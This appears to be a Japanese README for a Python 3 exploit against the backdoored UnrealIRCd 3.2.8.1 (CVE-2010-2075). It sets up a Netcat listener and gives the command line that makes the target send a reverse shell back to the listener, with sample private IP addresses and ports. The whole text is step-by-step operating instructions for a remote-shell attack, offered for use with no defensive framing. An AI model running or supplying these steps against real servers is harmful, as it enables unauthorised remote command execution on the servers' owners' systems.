
UnrealIRCd 3.2.8.1バックドア(CVE-2010-2075)用のPythonエクスプロイト。Netcatリスナーを介してリバースシェルを配信します。
UnrealIRCd 3.2.8.1 のバックドアを利用したコマンド実行エクスプロイト (Python 3 版) (CVE-2010-2075)。
UnrealIRCd バージョン 3.2.8.1 には、リモート攻撃者が任意のコマンドを実行できるトロイの木馬が含まれています (CVE-2010-2075)。
このスクリプトの作成にあたり、Metasploit のペイロード payload/cmd/unix/reverse_perl を参考にしました。
リスニングホストで Netcat リスナーを起動します:
nc -lp 4444
スクリプトを実行する際、以下の位置引数を指定します:
python3 script.py <target> <tport> <listener> <lport>
<target> ターゲットホストのIPアドレス。<tport> ターゲットホストのポート番号。<listener> リスニングホストのIPアドレス。<lport> リスニングホストのポート番号。ローカルマシンで Netcat リスナーをセットアップします:
nc -lp 4444
ターゲットマシン 192.168.1.3 の TCP ポート 6697 に対してスクリプトを実行します:
python3 script.py 192.168.1.3 6697 192.168.1.2 4444
1分ほど待つと、Netcat リスナーにリバースシェルが届くはずです。